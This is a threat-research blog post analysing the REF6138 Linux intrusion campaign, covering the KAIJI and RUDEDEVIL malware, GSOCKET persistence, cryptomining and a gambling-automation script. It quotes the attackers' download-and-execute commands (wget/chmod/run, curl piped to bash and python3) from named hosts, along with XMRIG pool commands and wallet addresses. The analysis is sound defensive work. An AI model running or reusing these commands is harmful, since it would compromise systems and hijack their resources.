+ "document": "---\ntitle: \"Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse\"\nslug: \"betting-on-bots\"\ndate: \"2024-09-27\"\ndescription: \"The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels.\"\nauthor:\n - slug: remco-sprooten\n - slug: ruben-groenewoud\nimage: \"betting-on-bots.jpg\"\ncategory:\n - slug: malware-analysis\n - slug: attack-pattern\ntags:\n - linux\n - kaiji\n - rudedevil\n - gsocket\n - cryptomining\n---\n\n## Introduction\n\nIn recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers. The attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access, the threat actors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.\n\nThe threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, Telegram bots for communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as KAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a cryptocurrency miner, were used to exploit system resources for malicious purposes.\n\nOur investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers might be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted daily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the malware authors.\n\nThis research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers' tactics, techniques, and procedures. 
We explore how they established initial access, the methods used for persistence and privilege escalation, and the malware deployed at each stage. Additionally, we discuss the command and control infrastructure, including the use of GSOCKET and Telegram for stealthy communication.\n\n## Execution flow\n\n### Initial access\n\nOur team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server running Apache2. Evidence of this compromise is seen in the execution of the `id` command via the Apache2 process, after which we see the threat actor exploiting the web server and deploying KAIJI malware under the `www-data` user account.\n\nShortly after the KAIJI deployment, the attacker used the `www-data` account to download a script named `00.sh` from the URL `http://61.160.194[.]160:35130`, which, after further investigation, also hosted several versions of RUDEDEVIL malware.\n\n`00.sh` is a stager that:\n\n* Sets its default shell and PATH.\n* Deletes several log files to erase traces of execution.\n* Leverages `ps`, `netstat`, `lsof`, and a list of common mining process names to kill any potential mining competition on the compromised host.\n* Flushes the `iptables` rules on the host, sets several `iptables` rules to block connections to specific destination ports and mining pools, and disables `iptables`.\n* Finally, a second stage (`sss6`/`sss68`) is downloaded and executed, and execution traces are erased.\n\nThe figure below shows a compressed version of the stager. Lines annotated with `[...]` are shortened to enhance readability. 
\n\n\n\n### Fileserver\n\nVia the backdoored web server process, the attacker downloaded and executed malware through the following command:\n\n```\nsh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 777 l86;./l86;rm -r l86\n```\n\nThe `l64` and `l86` files are downloaded from `http://107.178.101[.]245:5488`, after which they are granted all permissions, executed, and removed. Looking at the server that is hosting these malware samples, we see the following:\n\n\n\nThis seems to be a file server, hosting several types of malware for different architectures. The file server leverages the Rejetto technology. These malware samples have upload dates and download counters. For example, the `download.sh` file, uploaded on September 10th, had already been downloaded 3,100 times. \n\n\n\n### RUDEDEVIL/LUCIFER\n\nUpon closer inspection, the file `sss6`, which was downloaded and executed, has been identified as the RUDEDEVIL malware. Early in the execution process, we encounter an embedded message characteristic of this malware family:\n\n\n\n```\nHi, man. I\\'ve seen several organizations report my Trojan recently, \nPlease let me go. I want to buy a car. That\\'s all. I don\\'t want to hurt others. \nI can\\'t help it. My family is very poor. In China, it\\'s hard to buy a suite. \nI don\\'t have any accommodation. I don\\'t want to do anything illegal. \nReally, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc, \nthank yo\n```\n\nWe note that the files `l64` and `l86` that are hosted on the file server contain the same malware. 
When analyzing the execution flow of the malware we see that the main function of the malware performs several key tasks:\n\n* **Daemon Initialization:** The process is converted into a daemon using `daemon(1, 0)`.\n* **Socket Creation:** A socket is created and bound to a specific port.\n* **Signal Handling:** Custom signal handlers are set up for various signals.\n* **Service Initialization:** Several services are started using `SetFILE`.\n* **Privilege Handling:** It checks for root privileges and adjusts resource limits accordingly.\n* **Decryption:** The malware decrypts its configuration blobs.\n* **Thread Creation:** Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and CPU usage.\n* **Main Loop:** The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified duration.\n\nWhen examining the encryption routine, we find it utilizes XOR-based encoding:\n\n\n\nTo decode the contents statically, we developed a basic Python snippet:\n\n``` python\ndef DecryptData(data_block, encryption_key):\n key_modifier = encryption_key & 0xFF\n key_index = key_modifier // 0x5F # 0x5F = 95 in decimal\n modifier = (key_modifier - (key_index * 0x5F)) + 0x58 # 0x58 = 88 in decimal\n\n for i in range(len(data_block)):\n data_block[i] ^= modifier\n data_block[i] &= 0xFF # Ensure 8-bit value\n data_block[i] += modifier\n data_block[i] &= 0xFF # Ensure 8-bit value\n\n return data_block\n\n# Encoded data as hex strings\nencoded_data = [\n '4c494356515049490c467978',\n '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d372643400706314955032a593330233237587951215553552d464c0101414939514401515258414324273340254756564741404207004122782d50475555412d503106394d4c34554e48513926352054362a1e0d4e1e20',\n '0f424d4e0f435536575649484b',\n '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b',\n]\n\nencryption_key = 0x03FF # 1023 in 
decimal\n\n# Process and decrypt each encoded data string\nfor data in encoded_data:\n # Convert hex string to list of integers\n data_bytes = bytes.fromhex(data)\n data_block = list(data_bytes)\n\n # Decrypt the data\n decrypted_block = DecryptData(data_block, encryption_key)\n\n # Convert decrypted data back to bytes\n decrypted_bytes = bytes(decrypted_block)\n print(\"Decrypted text:\", decrypted_bytes.decode('utf-8', errors='ignore'))\n```\n\nAfter decoding the configuration, the following values are revealed:\n\n* The first value C2 domain `nishabii[.]xyz`.\n* The second value reveals options that will be passed to XMRIG.\n* The third value shows the temp file location the malware uses.\n* The fourth and last string shows the download location for the XMRIG binary.\n\n### Thread Management in the Malware\n\nThe malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail.\n\n#### Understanding the KillPid Function\n\nOne of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function begins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters an infinite loop, repeatedly executing its tasks.\n\nAt the heart of its functionality is an array called `sb_name`, which contains the names of processes the malware wants to terminate. \n\n\n\nEvery two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using a helper function called `getPidByName`. After each iteration, it moves to the next process in the list, ensuring all processes in `sb_name` are handled.\n\nInterestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10 minutes — before resuming its process checks. 
This extended sleep period is likely implemented to conserve system resources, ensuring the malware doesn't consume too much CPU time while monitoring processes.\n\n#### Understanding the Get_Net_Messages Function\n\nAnother crucial thread is responsible for monitoring network traffic, specifically focusing on the `eth0` network interface. This functionality is handled by the `getOutRates` function. The function begins by setting up necessary variables and opening the `/proc/net/dev` file, which contains detailed network statistics for each interface.\n\n\n\nIf the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the relevant network statistics. It specifically looks for the `eth0` interface, parsing the output rate data using a standard string parsing method. If successful, the function returns the output rate for `eth0`; otherwise, it returns `0`, ensuring the malware continues functioning even if an error occurs.\n\nThis routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being sent or received across the interface.\n\n#### Understanding the Get_Cpu_Message Function\n\nFor CPU monitoring, the malware uses the `GetCpuRates` function. This function continuously monitors the CPU usage by reading data from `/proc/stat`. Similar to how the network data is handled, the CPU statistics are read and parsed, allowing the malware to calculate the system's CPU usage.\n\n\n\nThe function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system. If the file cannot be opened for some reason, the function logs an error and gracefully exits. 
However, as long as it’s able to read the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance.\n\n#### Understanding the Send_Host_Message Function\n\nPerhaps the most critical thread is the one responsible for sending system information back to the malware operators. The `_SendInfo` function performs this task by collecting data about the infected system’s CPU and network usage. It begins by setting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU and network usage into a string.\n\n\n\nAdditionally, the function checks whether a particular process is running on the system and adjusts its formatted message accordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection.\n\nIn essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load and network activity. The operators can use this information to assess the status of their infection and adjust their activities as needed.\n\n### Connecting to the Command-and-Control (C2) Server\n\nOnce all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. This is managed by the `ConnectServer` function in the main thread, which handles communication with the server and executes commands remotely.\n\n#### Understanding the ConnectServer Function\n\nThe first task the `ConnectServer` function performs is establishing a connection to the C2 server using `ServerConnectCli`. After successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection remains stable over extended periods of time.\n\nOnce the connection is set up, the malware collects various pieces of system information, including the hostname, user information, CPU specs, and memory details. 
This information is then sent to the server as an initial data payload, providing the attackers with a detailed view of the infected machine.\n\nAfter this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The types of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues indefinitely, ensuring that the malware is ready to execute any command sent by its operators.\n\nWhen the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the socket, ending the session with the server.\n\n#### Command-and-Control (C2) Commands\n\nThe `ConnectServer` function processes a variety of commands from the C2 server, each designed to control a different aspect of the infected system. Here’s a breakdown of the commands handled by the malware:\n\n* **Case 4:** The malware calls the `DealwithDDoS` function, likely initiating a Distributed Denial of Service (DDoS) attack.\n* **Case 5:** Sets the `StopFlag` to `1`, which could signal the malware to stop specific tasks.\n* **Case 6:** Downloads a file from the server using `http_get`, changes its permissions, and then executes it. 
This command allows the attackers to run additional malware or scripts on the infected machine.\n* **Case 7:** Executes a system command using the `system` function, providing the attackers with direct control over the system’s command line.\n* **Case 8:** Sets `StopCpu` to `0`, restarting any previously halted CPU tasks.\n* **Case 9:** Sets `StopCpu` to `1`, halting all CPU tasks.\n* **Case 0xA:** Updates the CPU mining configuration with new data and retrieves the PID of the current process, allowing the malware to modify its cryptocurrency mining operations.\n* **Case 0xB:** Sets `stopxmr` to `1`, effectively stopping the XMRIG miner.\n* **Case 0xC:** Resets `stopxmr` to `0` and retrieves the current process PID, resuming the mining activity.\n\n\n\nEach command gives the malware operators precise control over how the infected machine behaves, whether it’s participating in a DDoS attack, running new malware, or managing mining operations.\n\n### Variants of RUDEDEVIL Malware and XMRIG Configuration\n\nWhile the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being uploaded. 
The core functionality of these versions remained largely the same, with the only significant variation being the embedded XMRIG commands used for cryptocurrency mining.\n\nEach version of the malware was configured to connect to the same mining pool, `c3pool.org`, but with slight differences in the parameters passed to the XMRIG miner:\n\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0`\n\nEach of these commands directs the miner to connect to the same mining pool but specifies different wallets or configurations. By examining the `c3pool` application, we confirmed that both XMR addresses associated with these commands are currently active and mining.\n\n\n\nAdditionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns, highlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining operations.\n\n## GSOCKET\n\nTo establish persistence, the threat actor downloaded and installed [GSOCKET](https://github.com/hackerschoice/gsocket), a network utility designed to enable encrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent connections through the Global Socket Relay Network (GSRN). 
This open-source tool includes features like AES-256 encryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for encrypted file transfers, remote command execution, and even the creation of hidden services.\n\nAlthough GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.\n\nOnce deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the system for active kernel processes to decide which process it will masquerade as:\n\n\n\nIt then creates the `/dev/shm/.gs-1000` directory to download and store its binary in shared memory. Additionally, by default, it sets up an `/htop` directory under `/home/user/.config/htop/` to store both the GSOCKET binary and the secret key used for its operations.\n\nNext, it sets up a cron job that runs the GSOCKET binary with the secret key every minute.\n\n\n\nThe binary is executed under the name of a kernel process using the `exec -a [process_name]` command, further enhancing its ability to evade detection. The cron job includes a base64-encoded command that, when decoded, ensures the persistence mechanism is regularly executed and disguised as a legitimate kernel process:\n\nWhen decoding the payload, we see how the `defunct.dat` secret key is used as an argument to execute the `defunct` binary, which is masqueraded as `[raid5wq]` through the use of the `exec -a` command:\n\nIn addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run control (`rc.local`), and Systemd. 
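The `exec -a` trick GSOCKET uses for masquerading is a standard bash feature, and its effect is easy to demonstrate in isolation (a minimal sketch; the process name `[raid5wq]` is taken from the observed cron payload, the rest is illustrative):

```shell
# bash's `exec -a <name>` replaces the current shell with the target program
# while setting argv[0] to <name>; tools that display argv[0] (e.g. `ps -o args`)
# then show the fake kernel-thread name instead of the real binary.
bash -c 'exec -a "[raid5wq]" sh -c "echo masqueraded as: \$0"'
# prints: masqueraded as: [raid5wq]
```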
GSOCKET enumerates potential persistence locations:\n\n\n\nGSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and notifications:\n\n\n\nFinally, after installation, GSOCKET ensures that all files that are created or modified are timestomped, in an attempt to erase any trace of the installation:\n\n\n\nThese features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign, GSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection.\n\nAdditionally, a PHP payload was fetched from an external IP and saved as `404.php`, likely functioning as a backdoor for future access. We did not manage to obtain this payload.\n\n### Post compromise dwell time\n\nAfter a quiet three-week period with no noticeable activity, the threat actors resumed operations by utilizing the built-in Python3 to establish a reverse connection to a new command-and-control server.\n\nAfter regaining access to the host, a newer version of the KAIJI malware was deployed.\n\n### KAIJI malware: a comparison to previous samples\n\nWhile investigating the files on the discovered file server, we saw a shell script. This shell script appears to be the main file downloaded by an earlier stage, ensuring the correct binary for the victim's architecture is used.\n\n\n\nThe same shell script is found in other reports, where it is used to deploy KAIJI.\n\nAs part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with samples identified by Black Lotus Labs in 2022. Their detailed analysis of `Chaos` (KAIJI) can be found in their blog post [here](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/).\n\nUsing [BinDiff](https://github.com/google/bindiff), a binary comparison tool, we compared the functions in the binaries. 
The analysis revealed that the code in our sample was identical to the previously identified KAIJI sample from 2022.\n\n\n\nAlthough the code was the same, one critical difference stood out: the C2 server address. While the functionality remained consistent in both binaries, they pointed to different C2 domains.\n\nDelving deeper into the disassembly, we identified a function named `main_Link`. This function is responsible for decoding the C2 server address used by the malware.\n\n\n\nOnce decoded, the function searches for the `|(odk)/*-` postfix in the address and removes it, leaving only the C2 domain and port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change between samples.\n\nGiven that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed look at its behaviors.\n\n\n\nAfter execution, KAIJI creates several files in the `/etc/` and `/dev/` directories: `/etc/id.services.conf`, `/etc/32678`, `/dev/.img` and `/dev/.old`. These artifacts are placed to establish persistence.\n\nTwo services are set up: `/etc/init.d/linux_kill` and `crond.service`. `crond.service` is executed by Systemd, while `linux_kill` is used for SysVinit persistence.\n\nAfter reloading the Systemd daemon, the first network connection to the C2 is attempted.\n\n\n\nNext, the `Systemd Late generator` service file is created. More information on the workings of `Systemd` and the different ways of establishing persistence through it can be found in our recent blog series dubbed [Linux Detection Engineering - A primer on persistence mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nKAIJI creates the `/boot/System.img.config` file, an executable that is run through the previously deployed `Systemd` services. This binary is, amongst other binaries, another way of establishing persistence. 
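The postfix handling in `main_Link` described above is straightforward to model; below is a minimal Python sketch of that step, using a hypothetical decoded address (the real C2 differs between samples, and the string decoding itself is omitted):

```python
def strip_c2_postfix(decoded: str) -> str:
    """Remove KAIJI's `|(odk)/*-` marker, leaving only the C2 domain and port."""
    marker = "|(odk)/*-"
    idx = decoded.find(marker)
    # If the marker is absent, return the address unchanged.
    return decoded[:idx] if idx != -1 else decoded

# Hypothetical decoded blob, for illustration only:
print(strip_c2_postfix("example[.]com:443|(odk)/*-"))  # → example[.]com:443
```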
\n\n\n\nNext, KAIJI adjusts the `SELinux` policies to allow unauthorized actions. It searches audit logs for denied operations related to `System.img.conf`, generates a new `SELinux` policy to permit these actions, and installs the policy with elevated priority. By doing this, the malware bypasses security restrictions that would normally block its activity.\n\nAdditionally, it sets up multiple other forms of persistence through bash profiles and creates two more malicious artifacts: `/usr/lib/libd1rpcld.so` and `/.img`.\n\nRight after, `/etc/crontab` is altered through an echo command, ensuring that the `/.img` file is executed by root on a set schedule.\n\n\n\nKAIJI continues by moving several default system binaries to unusual locations, attempting to evade detection along the way.\n\n\n\nKAIJI uses the `renice` command to grant PID `2957`, one of KAIJI's planted executables, the highest possible priority (on a scale of -20 to 19, where -20 is the highest priority), ensuring it gets more CPU resources than other processes.\n\nTo evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities by manipulating how directories are mounted and viewed within the system.\n\nFinally, we see a trace of `cron` executing `/.img`, which was planted in the `/etc/crontab` file earlier.\n\n## The saga continues\n\nTwo weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the `www-data` user through the Apache2 process using the command:\n\n```\nsh -c wget http://91.92.241[.]103:8002/gk.php\n```\n\nThe contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the attackers deploying `pspy64`. `Pspy` is a command-line tool for process snooping on Linux systems without requiring root permissions. It monitors running processes, including those initiated by other users, and captures events like cron job executions. 
This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing the commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for reconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities.\n\nNotably, `pspy64` was executed by the `[rcu_preempt]` parent, indicating that the threat actors had transitioned from leveraging the web server backdoor to using the GSOCKET backdoor.\n\nFurther attempts at privilege escalation involved exploiting `CVE-2021-4034`, also known as `pwnkit`. This vulnerability affects the `pkexec` component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute arbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially leading to full control over the affected machine.\n\n### Custom built binaries\n\nRight after, the attackers attempted to download a custom-built malware named `apache2` and `apache2v86` from:\n\n* `http://62.72.22[.]91/apache2`\n* `http://62.72.22[.]91/apache2v86`\n\nWe obtained copies of these files, which currently have zero detections on VirusTotal. However, when executing them dynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over a week, the threat actor attempted to alter, upload and execute these binaries more than 15 times, but due to repeated segfaults, it is unlikely that they succeeded in running this custom malware.\n\nWhile the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several XOR-encoded strings within the samples.\n\n\n\nThe XOR key used to encode the strings was identified as `0x79` (or the character `y`). 
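Since the strings are encoded with a single-byte XOR, decoding is symmetric; a minimal Python sketch of the routine we applied (the sample plaintext below is taken from the decoded headers and used here only for a round-trip demonstration):

```python
XOR_KEY = 0x79  # the character 'y'

def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    # XOR is its own inverse, so the same routine both encodes and decodes.
    return bytes(b ^ key for b in data)

# Round-trip demonstration with one of the recovered header fragments:
encoded = xor_decode(b"sec-ch-ua-platform")
print(xor_decode(encoded).decode())  # → sec-ch-ua-platform
```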
After decoding the strings, we discovered fragments of an HTTP request header that the malware was attempting to construct:\n\n```\n/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1\nsec-ch-ua: \"Chromium\";v=\"122\", \"Google Chrome\";v=\"122\", \"Not-A.Brand\";v=\"99\nsec-ch-ua-platform: \"Windows\"\nupgrade-insecure-requests: 1\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nreferer: https://twitter[.]com\naccept-language: ru,en-US;q=0.9\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.\n```\n\nThis indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature of the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or operational.\n\n### Additional reconnaissance \n\nThe attackers continued to use tools from The Hacker’s Choice, by downloading and executing [`whatserver.sh`](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh).\n\nThis Shell script is designed to gather and display server information. It extracts details such as the fully qualified domain names (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like CPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities, including last logged-in users and currently listening services.\n\n### Mining activities\n\nAfter nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely having failed to gain root access. 
Instead, they established persistence as the `www-data` user, leveraging GSOCKET to set up an SSL connection, which was disguised as a kernel process called `[mm_percpu_wq]`.\n\nAfter decoding the base64 contents, we get a very familiar looking output:\n\nThrough our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly into the crontab. \n\nThis command tries to download `http://gcp.pagaelrescate[.]com:8080/ifindyou` every minute, and pipe it to bash. Looking at the contents of `ifindyou`, we see the following Bash script:\n\n\n\nThis script gathers hostname and IP information, downloads the `SystemdXC` archive from `http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC` (XMRIG), stores this in `/tmp/SystemdXC`, extracts the archive and executes it with the necessary parameters to start mining Bitcoin.\n\nWhen examining the mining command, we can see how the malware configures XMRIG:\n\nThis command connects to the `unmineable.com` mining pool, using the infected machine’s hostname as an identifier in the mining process. At the time of writing, there are 15 active workers mining Bitcoin for the wallet address `1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz`.\n\n\n\nUpon further investigation into the Bitcoin address, we found that this address has performed a single transaction.\n\n\n\nInterestingly, the output address for this transaction points to a well-known [hot wallet](https://www.ledger.com/academy/topics/security/hot-wallet-vs-cold-crypto-wallet-whats-the-difference) associated with Binance, indicating that the attackers may have transferred their mining earnings to an exchange platform.\n\n\n\nWhen returning our focus back to the script, we also see two commands commented out, which will become more clear later. 
The script executes:\n\n```\ncurl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash\n```\n\nLooking at this payload, we can see the following contents:\n\n\n\nThis stage checks the output of the command, and sends this to a Telegram chat bot. Through our Telegram behavioral rule, we can see that a Telegram POST request looks like this:\n\nThe cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes:\n\n```\ncurl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3\n```\n\nThe downloaded Python script automates interactions with an online gambling game through HTTP requests. The script includes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server.\n\nUpon closer examination, we identified the following key components of the script:\n\n**Global Variables:**\n\n* `usuario`: Stores the user ID for managing the session.\n* `apuesta`: Represents the bet amount.\n* `ganancias`: Tracks the winnings and losses.\n* `saldo_actual`: Holds the current account balance.\n\n\n\n#### Understanding the `obteneruid` Function\n\nThis function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote server. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful authentication, it returns a session UUID, which is used for further interactions in the game.\n\n\n\n\n#### Understanding the `enviardatos` Function\n\nThis function sends game data or status updates back to `gcp.pagaelrescate[.]com`, logging the results or actions taken during gameplay. It uses a simple GET request to transmit this data to the remote server.\n\n\n\n#### Understanding the `hacerjugada` Function\n\nThe `hacerjugada` function simulates the betting process for a set number of rounds. 
It sends POST requests to place bets, updates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls `completarbono()` to handle any bonus game details. Between each betting round, the function enforces a 30-second delay to mimic natural gameplay and avoid detection.\n\n\n\n#### Understanding the `completarbono` Function\n\nWhen a bonus round is triggered, this function completes the round by sending a request containing the session ID and round ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is sent back to the remote server using the `enviardatos()` function.\n\n\n\n#### Likely Used for Testing Purposes\n\nIt’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the gambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find vulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their approach, potentially in preparation for more sophisticated or widespread attacks.\n\n## REF6138 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. 
During this investigation, we identified the following tactics, techniques and sub-techniques:\n\n*MITRE ATT&CK tactics, techniques and sub-techniques used*\n\n| Tactic | Technique | Sub-Technique |\n|----------------------|----------------------------------------------------|------------------------------------------------------------------------------------|\n| Resource Development | T1587: Develop Capabilities | Malware |\n| | T1588: Obtain Capabilities | Tool |\n| | T1608: Stage Capabilities | Upload Malware |\n| | | Upload Tool |\n| Initial Access | T1190: Exploit Public-Facing Application | |\n| Execution | T1059: Command and Scripting Interpreter | Unix Shell |\n| | | Python |\n| | T1053: Scheduled Task/Job | Cron |\n| Persistence | T1546: Event Triggered Execution | Unix Shell Configuration Modification |\n| | T1053: Scheduled Task/Job | Cron |\n| | T1505: Server Software Component | Web Shell |\n| Privilege Escalation | T1068: Exploitation for Privilege Escalation | |\n| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | |\n| | T1222: File and Directory Permissions Modification | Linux and Mac File and Directory Permissions Modification |\n| | T1564: Hide Artifacts | Hidden Files and Directories |\n| | T1070: Indicator Removal | Timestomp |\n| | T1036: Masquerading | Masquerade Task or Service |\n| | T1027: Obfuscated Files or Information | Software Packing |\n| | | Stripped Payloads |\n| | | Command Obfuscation |\n| | | Encrypted/Encoded File |\n| Discovery | T1057: Process Discovery | |\n| | T1082: System Information Discovery | |\n| | T1061: System Network Configuration Discovery | |\n| | T1049: System Network Connections Discovery | |\n| | T1007: System Service Discovery | |\n| Collection | T1119: Automated Collection | |\n| | T1005: Data from Local System | |\n| Command and Control | T1071: Application Layer Protocol | Web Protocols |\n| | T1132: Data Encoding | Standard Encoding |\n| | T1001: Data Obfuscation | |\n| | T1573: Encrypted 
Channel | Symmetric Cryptography |\n| | T1105: Ingress Tool Transfer | |\n| | T1571: Non-Standard Port | |\n| | T1572: Protocol Tunneling | |\n| | T1102: Web Service | |\n| Impact | T1496: Resource Hijacking | |\n\n## **Detecting REF6138**\n\nElastic Security implements a multi-layer approach to threat detection, leveraging behavioral SIEM and Endpoint rules, YARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic Security that play a big role in capturing the identified threats.\n\n### Detection\n\nThe following detection rules were observed throughout the analysis of this intrusion set:\n\n* [Segfault Detection](https://github.com/elastic/detection-rules/blob/main/rules_building_block/execution_linux_segfault.toml)\n* [Timestomping using Touch Command](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/defense_evasion_timestomp_touch.toml)\n* [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml)\n* [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml)\n\n### Prevention\n\nThe following behavior prevention events were observed throughout the analysis of this intrusion set:\n\n* [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_suspicious_utility.toml)\n* [Defense Evasion via Bind Mount](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/defense_evasion_defense_evasion_via_bind_mount.toml)\n* [Linux Suspicious Child Process Execution via Interactive Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_suspicious_child_process_execution_via_interactive_shell.toml)\n* [Potential Linux Hack Tool 
